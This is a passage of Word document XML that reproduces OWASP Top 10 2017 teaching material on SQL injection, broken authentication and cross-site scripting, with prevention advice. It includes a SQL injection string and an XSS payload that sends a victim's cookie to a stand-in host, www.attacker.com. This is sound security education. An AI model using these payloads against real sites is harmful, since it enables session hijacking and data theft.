        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>?id</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002F1F2E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=' or '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F1F2E" w:rsidRPr="002F1F2E" w:rsidRDefault="002F1F2E" w:rsidP="002F1F2E">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F1F2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>This changes the meaning of both queries to return all the records from the accounts table. More dangerous attacks could modify data or even invoke stored procedures.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF6C08" w:rsidRPr="00BF6C08" w:rsidRDefault="004D49A4" w:rsidP="00BF6C08">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F1FF"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:tooltip="Top 10 2017-A2-Broken Authentication and Session Management" w:history="1">
        <w:r w:rsidR="00BF6C08" w:rsidRPr="00BF6C08">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0B0080"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>A2-Broken Authentication and Session Management</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00BF6C08" w:rsidRPr="00BF6C08" w:rsidRDefault="00BF6C08" w:rsidP="00BF6C08">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F1FF"/>
        <w:spacing w:after="24" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF6C08">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>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p w:rsidR="00BF6C08" w:rsidRPr="00BF6C08" w:rsidRDefault="00BF6C08" w:rsidP="00BF6C08">
      <w:pPr>
        <w:spacing w:after="45" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1647"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF6C08">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1647"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Example Attack Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF6C08" w:rsidRPr="00BF6C08" w:rsidRDefault="00BF6C08" w:rsidP="00BF6C08">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF6C08">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Scenario #1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF6C08">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> Airline reservations application supports URL rewriting, putting session IDs in the URL:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF6C08" w:rsidRPr="00BF6C08" w:rsidRDefault="00BF6C08" w:rsidP="00BF6C08">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF6C08">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://example.com/sale/saleitems</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BF6C08">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BF6C08">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF6C08">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sessionid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BF6C08">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=268544541</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF6C08">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;dest=Hawaii</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF6C08" w:rsidRPr="00BF6C08" w:rsidRDefault="00BF6C08" w:rsidP="00BF6C08">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF6C08">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>An authenticated user of the site wants to let their friends know about the sale. User e-mails the above link without knowing they are also giving away their session ID. When the friends use the link they use user’s session and credit card.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF6C08" w:rsidRPr="00BF6C08" w:rsidRDefault="00BF6C08" w:rsidP="00BF6C08">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF6C08">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Scenario #2</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF6C08">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF6C08">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> Application’s timeouts aren’t set properly. User uses a public computer to access site. Instead of selecting “logout” the user simply closes the browser tab and walks away. An attacker uses the same browser an hour later, and that browser is still authenticated.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF6C08" w:rsidRPr="00BF6C08" w:rsidRDefault="00BF6C08" w:rsidP="00BF6C08">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF6C08">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Scenario #3</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF6C08">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF6C08">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> An insider or external attacker gains access to the system’s password database. User passwords are not properly hashed and salted, exposing every users’ password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF6C08" w:rsidRPr="00BF6C08" w:rsidRDefault="004D49A4" w:rsidP="00BF6C08">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F1FF"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId7" w:tooltip="Top 10 2017-A3-Cross-Site Scripting (XSS)" w:history="1">
        <w:r w:rsidR="00BF6C08" w:rsidRPr="00BF6C08">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0B0080"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>A3-Cross-Site Scripting (XSS)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00BF6C08" w:rsidRPr="00BF6C08" w:rsidRDefault="00BF6C08" w:rsidP="00BF6C08">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F1FF"/>
        <w:spacing w:after="24" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF6C08">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user supplied data using a browser API that can create JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00801517" w:rsidRPr="00801517" w:rsidRDefault="00801517" w:rsidP="00801517">
      <w:pPr>
        <w:spacing w:after="45" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1647"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1647"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Example Attack Scenarios</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The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00801517" w:rsidRPr="00801517" w:rsidRDefault="00801517" w:rsidP="00801517">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(String) page += "&lt;input name='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>creditcard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' type='TEXT'</w:t>
      </w:r>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">value='" + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>request.getParameter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"CC") + "'&gt;";</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The attacker modifies the ‘CC’ parameter in his browser to:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00801517" w:rsidRPr="00801517" w:rsidRDefault="00801517" w:rsidP="00801517">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'&gt;&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>document.location</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>'http</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/www.attacker.com/cgi-bin/cookie.cgi?</w:t>
      </w:r>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>foo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>='+</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/script&gt;'.</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This attack causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session. Note that attackers can also use XSS to defeat any automated CSRF defense the application might employ. See </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tooltip="Top 10 2017-A8-Cross-Site Request Forgery (CSRF)" w:history="1">
        <w:r w:rsidRPr="00801517">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0B0080"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>2017-A8</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> for info on CSRF.</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Preventing XSS requires separation of untrusted data from active browser content.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00801517" w:rsidRPr="00801517" w:rsidRDefault="00801517" w:rsidP="00801517">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>To avoid </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:anchor="Server_XSS" w:tooltip="Types of Cross-Site Scripting" w:history="1">
        <w:r w:rsidRPr="00801517">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0B0080"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>Server XSS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, the preferred option is to properly escape untrusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. See the </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:tooltip="XSS (Cross Site Scripting) Prevention Cheat Sheet" w:history="1">
        <w:r w:rsidRPr="00801517">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0B0080"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>OWASP XSS Prevention Cheat Sheet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> for details on the required data escaping techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00801517" w:rsidRPr="00801517" w:rsidRDefault="00801517" w:rsidP="00801517">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>To avoid </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:anchor="Client_XSS" w:tooltip="Types of Cross-Site Scripting" w:history="1">
        <w:r w:rsidRPr="00801517">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0B0080"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>Client XSS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, the preferred option is to avoid passing untrusted data to JavaScript and other browser APIs that can generate active content. When this cannot be avoided, similar context sensitive escaping techniques can be applied to browser APIs as described in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:tooltip="DOM based XSS Prevention Cheat Sheet" w:history="1">
        <w:r w:rsidRPr="00801517">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0B0080"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>OWASP DOM based XSS Prevention Cheat Sheet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
